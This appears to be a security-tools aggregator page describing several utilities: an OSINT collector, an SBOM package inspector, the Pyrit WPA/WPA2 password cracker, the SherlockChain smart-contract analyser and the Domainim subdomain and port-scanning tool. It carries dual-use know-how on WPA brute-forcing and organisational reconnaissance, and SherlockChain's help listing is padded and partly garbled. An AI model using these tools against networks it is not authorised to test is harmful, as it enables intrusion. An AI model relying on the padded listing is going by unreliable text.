    Encode/Decode

    • [x] ascii85-encode - Encode your text to ascii85
    • [x] ascii85-decode - Decode your ascii85 text
    • [x] base32-decode - Decode your base32 text
    • [x] base32-encode - Encode your text to base32
    • [x] base64-decode - Decode your base64 text
    • [x] base64-encode - Encode your text to base64
    • [x] base85-encode - Encode your text to base85
    • [x] base85-decode - Decode your base85 text
    • [x] base64url-decode - Decode your base64 url
    • [x] base64url-encode - Encode your text to url
    • [x] html-decode - Unescape your HTML
    • [x] html-encode - Escape your HTML
    • [x] rot13-encode - Encode your text to ROT13
    • [x] url-decode - Decode URL entities
    • [x] url-encode - Encode URL entities

    Hash

    • [x] bcrypt - Get the Bcrypt hash of your text
    • [x] md5 - Get the MD5 checksum of your text
    • [x] sha1 - Get the SHA1 checksum of your text
    • [x] sha256 - Get the SHA256 checksum of your text
    • [x] sha512 - Get the SHA512 checksum of your text

    String

    • [x] camel - Transform your text to CamelCase
    • [x] kebab - Transform your text to kebab-case
    • [x] lower - Transform your text to lower case
    • [x] reverse - Reverse Text ( txeT esreveR )
    • [x] slug - Transform your text to slug-case
    • [x] snake - Transform your text to snake_case
    • [x] title - Transform your text to Title Case
    • [x] upper - Transform your text to UPPER CASE

    Lines

    • [x] count-lines - Count the number of lines in your text
    • [x] reverse-lines - Reverse lines
    • [x] shuffle-lines - Shuffle lines randomly
    • [x] sort-lines - Sort lines alphabetically
    • [x] unique-lines - Get unique lines from list

    Spaces

    • [x] remove-spaces - Remove all spaces + new lines
    • [x] remove-newlines - Remove all new lines

    Count

    • [x] count-chars - Find the length of your text (including spaces)
    • [x] count-lines - Count the number of lines in your text
    • [x] count-words - Count the number of words in your text

    RGB/Hex

    • [x] hex-rgb - Convert a #hex-color code to RGB
    • [x] hex-encode - Encode your text Hex
    • [x] hex-decode - Convert Hexadecimal to String

    JSON

    • [x] json - Format your text as JSON
    • [x] json-escape - JSON Escape
    • [x] json-unescape - JSON Unescape
    • [x] json-yaml - Convert JSON to YAML text
    • [x] json-msgpack - Convert JSON to MSGPACK
    • [x] msgpack-json - Convert MSGPACK to JSON

    YAML

    • [x] yaml-json - Convert YAML to JSON text

    Markdown

    • [x] markdown-html - Convert Markdown to HTML

    Extract

    • [x] extract-emails - Extract emails from given text
    • [x] extract-ip - Extract IPv4 and IPv6 from your text
    • [x] extract-urls - Extract URls your text ( we don't do ping check )

    Other

    • [x] escape-quotes - escape single and double quotes from your text
    • [x] completion - generate the autocompletion script for the specified shell
    • [x] interactive - Use sttr in interactive mode
    • [x] version - Print the version of sttr
    • [x] zeropad - Pad a number with zeros
    • [x] and adding more....

    Featured On

    These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R

     


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

    By: Zion3R


    This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

    The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.


    Installation

    The packages needed are mentioned in the requirements.txt file and can be installed using pip:

    pip3 install -r requirements.txt

    Usage

    • First of all install the packages.
    • Secondly , you need to set up environment variables such as:
      • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
    • Finally run the tool to list all the packages.
    Argument Description
    --analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
    --static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
    --volume-path Specifies the path to the mounted volume. Default is /mnt.
    --save-file Specifies the output file for JSON output.
    --info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
    --pkg-mgr Manually specify the package manager or dont add this option for automatic check.
    APT:
    - Static Info Analysis:
    - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
    - It analyzes the packages installed on the mounted volume located at /mnt.
    - It saves the output in a JSON file named output.json.
    - It generates visual plots for CHROOT analysis.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
    ```
    • Static Service Analysis:

    • This command runs the program in static analysis mode, specifically using the Service file analysis method.

    • It analyzes the packages installed on the mounted volume located at /custom_mount.
    • It saves the output in a JSON file named output.json.
    • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

    • Chroot analysis with or without Graphic output:

    • This command runs the program in chroot analysis mode.
    • It analyzes the packages installed on the mounted volume located at /mnt.
    • It saves the output in a JSON file named output.json.
    • It generates visual plots for CHROOT analysis.
    • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

    RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json

    • Chroot analysis with or without Graphic output:
    • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

    Supporting Images

    Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.

    I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.

    Graphical Output Images (Chroot)

    APT Chroot

    RPM Chroot

    Inner Workings

    For the workings and process related documentation please read the wiki page: Link

    TODO

    • [x] Support for RPM
    • [x] Support for APT
    • [x] Support for Chroot Analysis
    • [x] Support for Versions
    • [x] Support for Chroot Graphical output
    • [x] Support for organized graphical output
    • [ ] Support for Pacman

    Ideas and Discussions

    Ideas regarding this topic are welcome in the discussions page.



    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    ## Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

    A fast and comprehensive tool for organizational network scanning (6)

    A fast and comprehensive tool for organizational network scanning (7)

    • Virtual hostname enumeration
    • Reverse DNS lookup

    A fast and comprehensive tool for organizational network scanning (8)

    • Detects wildcard subdomains (for bruteforcing)

    A fast and comprehensive tool for organizational network scanning (9)

    • Basic TCP port scanning
    • Subdomains are accepted as input

    A fast and comprehensive tool for organizational network scanning (10)

    • Export results to JSON file

    A fast and comprehensive tool for organizational network scanning (11)

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source- - Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port e
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

    Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
    {
    "subdomain": string,
    "data": [
    "ipv4": string,
    "vhosts": [string],
    "reverse_dns": string,
    "ports": [int]
    ]
    }
    ]

    Example json for nmap.org can be found here.

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed, it just brings repeition on the table.

    A fast and comprehensive tool for organizational network scanning (12)

    Printing as the following might've been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

    A fast and comprehensive tool for organizational network scanning (13)

    DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

